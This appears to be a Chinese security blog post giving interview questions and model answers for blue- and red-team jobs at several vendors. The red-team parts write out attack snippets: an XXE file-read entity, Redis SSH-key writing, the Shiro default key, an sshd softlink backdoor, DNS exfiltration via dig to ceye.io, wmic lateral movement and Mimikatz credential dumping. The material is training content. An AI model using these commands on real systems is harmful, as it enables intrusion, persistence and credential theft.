网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
各厂商二面试题01
一、青藤 蓝队 1、自我介绍 2、设备误报如何处理(日志) 3、如何查看区分是扫描流量和手动流量(扫描数据量大,请求有规律,手动扫描间隔较少) 4、被拿shell了如何处理(排查、清除、关站、看看可有即使修复的可能,没有可能就关站) 5、如何分析被代理出来的数据流 二、360 蓝队 1、溯源 态势感知 安全设备 2、基础的漏洞原理 ssrf xxe Redis几种利用方式 三、漏洞盒子 1、印象最深的渗透经历,技术关键点 2、是否在漏洞平台有提交过漏洞,以及排名情况 3、平时挖洞的情况,平台提交漏洞和渗透测试方面 四、未知厂商 1、讲一下使过的中间件漏洞 2、getshell后如何维持权限 3、隧道、流量代理方面 五、长亭-红队 红队(内容稍多) 问:打点一般会用什么漏洞 问:平常怎么去发现shiro漏洞的 问:shiro有几种漏洞类型 问:weblogic权限绕过有没有了解 问:fastjson漏洞利用原理 问:weblogic有几种漏洞 问:IIOP听说过吗,和什么类似 问:这几个漏洞不出网情况下怎么办 问:拿到webshell不出网情况下怎么办 问:dns出网协议怎么利用 问:横向渗透命令执行手段 问:psexec和wmic或者其他的区别 问:Dcom怎么操作? 问:抓取密码的话会怎么抓 问:什么版本之后抓不到密码 问:抓不到的话怎么办 问:域内攻击方法有了解过吗 问:桌面有管理员会话,想要做会话劫持怎么做
一、青藤(蓝队)
1. 自我介绍
需结合个人经验,突出以下要素:
- 攻防演练经历(如护网行动中的角色、成果);
- 安全设备运维经验(如EDR、WAF、蜜罐的部署与分析);
- 威胁分析能力(如日志分析、流量溯源)。
2. 设备误报处理(日志)
- 验证误报:对比原始日志与设备告警,检查请求参数、响应状态码是否合理;
- 分类处理:通过白名单(如业务IP、合法扫描工具)或调整检测规则阈值;
- 自动化优化:结合SIEM系统标记低风险事件,减少人工干预。
3. 扫描流量与手动流量的区分
- 扫描流量特征:
- 高频请求(如每秒数十次同路径访问);
- 固定User-Agent(如sqlmap、Nmap标识);
- 覆盖全端口/IP段(如顺序扫描1-65535端口)。
- 手动流量特征:
- 请求间隔随机(人工操作延迟);
- 参数尝试性变化(如手工测试SQL注入的
'
、1=1
);- 关联登录态(如携带Cookie的敏感操作)。
4. 被拿Shell的应急响应
- 隔离阶段:
- 立即断开服务器网络或关闭非核心服务;
- 保留现场(内存转储、进程快照)。
- 排查阶段:
- 查Web日志定位入侵路径(如上传漏洞、反序列化入口);
- 检查计划任务、启动项、隐藏进程(如Linux cron、Windows注册表);
- 比对Webshell哈希与正常文件。
- 修复阶段:
- 修补漏洞(如框架升级、配置加固);
- 部署HIDS监控异常行为(如命令执行、敏感目录访问)。
5. 代理数据流分析
- 流量特征提取:
- 协议识别(如HTTP代理流量中的
CONNECT
方法);- 载荷分析(如Base64编码的隧道数据);
- 行为关联:
- 追踪源IP与目标IP的会话持续性;
- 检测异常DNS请求(如DNS隧道中的长域名查询)。
二、360(蓝队)
1. 溯源与态势感知
- 溯源方法:
- 结合威胁情报(如IP信誉库、恶意域名库);
- 关联多设备日志(如防火墙拦截记录 + EDR进程树分析)。
- 态势感知设备联动:
- 通过NDR(网络检测与响应)实时分析流量;
- 与SOAR平台集成自动化封禁恶意IP。
2. 基础漏洞原理
- SSRF:利用服务端发起内部请求(如读取
file:///etc/passwd
或攻击Redis);- XXE:解析外部实体导致文件读取/SSRF(如
<!ENTITY xxe SYSTEM "file:///etc/passwd">
);- Redis利用:
- 未授权写SSH密钥(
config set dir /root/.ssh
);- 主从复制RCE(通过
SLAVEOF
加载恶意模块)。
三、漏洞盒子
1. 印象最深的渗透经历
案例:某金融系统通过链式漏洞突破边界:
- 信息泄露:Git源码暴露数据库配置;
- 垂直越权:修改Cookie中的
userid
参数访问管理员接口;- RCE:利用Fastjson反序列化注入内存马。
技术关键点:绕过WAF规则(如分块传输编码、注释符混淆)。2. 漏洞平台提交与排名
- 示例回答:在EDUSRC/CNVD提交过20+漏洞,曾获某季度TOP 10;
- 强调漏洞类型多样性(如逻辑漏洞占比40%,配置错误占比30%)。
3. 挖洞与渗透测试
- 平台提交:侧重自动化工具+人工验证(如AWVS扫描后手工挖掘业务逻辑漏洞);
- 渗透测试:红队协作模式(如内网横向渗透时结合BloodHound分析域环境)。
四、未知厂商
1. 中间件漏洞
- Apache:解析漏洞(
.php.xxx
被当作PHP执行);- Nginx:错误配置导致目录穿越(
/files../
);- Tomcat:CVE-2017-12615(PUT上传漏洞)。
2. 权限维持手段
- 后门类型:
- Web层:隐藏Webshell(如
.index.php.swp
);- 系统层:SSH软链接后门(
ln -sf /usr/sbin/sshd /tmp/su
);- 计划任务:Linux cron或Windows任务计划程序加载恶意脚本。
3. 隧道与代理
- 工具选择:
- HTTP隧道:reGeorg/proxychains;
- ICMP/DNS隧道:icmpsh/dnscat2;
- 隐蔽性优化:流量加密(如AES) + 模拟合法协议(如伪装成Cloudflare流量)。
五、长亭-红队(红队)
1. 打点漏洞
- 高频漏洞:
- Web框架漏洞(如Shiro反序列化、Fastjson RCE);
- 中间件漏洞(Weblogic T3协议反序列化);
- 未授权访问(如Redis、Hadoop YARN)。
2. Shiro漏洞检测
- 识别特征:Cookie中的
rememberMe
字段;- 利用方式:
- 密钥硬编码(如默认密钥
kPH+bIxk5D2deZiIxcaaaA==
);- 反序列化Gadget(如CommonsBeanutils链)。
3. Shiro漏洞类型
- 反序列化漏洞(CVE-2016-4437);
- 权限绕过(CVE-2020-1957);
- 密钥硬编码(默认密钥未修改)。
4. 不出网场景利用
- 协议复用:
- 利用SMB协议进行内网穿透(如Procmon监控445端口);
- DNS Log外带数据(如通过
dig xxx.ceye.io
回传结果)。- 工具适配:
- 不出网Webshell使用内存马(如Java Agent注入);
- 通过ICMP隧道执行命令(如PingTunnel)。
5. 横向渗透与密码抓取
- 横向命令执行:
- WMI执行远程命令(
wmic /node:192.168.1.2 process call create "cmd.exe"
);- DCOM通过MMC20.Application组件调用(
GetObject("winmgmts:\\\\192.168.1.2\\...")
)。- 密码抓取与绕过:
- 工具:Mimikatz(
sekurlsa::logonpasswords
);- Windows 2012后需绕过LSA保护(如加载驱动
mimidrv.sys
);- 无明文密码时使用PTH(Pass-the-Hash)或Kerberos票证攻击。
6. 会话劫持
- 工具与方法:
- 使用Mimikatz的
ts::sessions
查看会话ID;- 通过RDP劫持(如Shadow Attack)接管已登录的会话;
- 注入DLL到explorer.exe 进程获取用户令牌。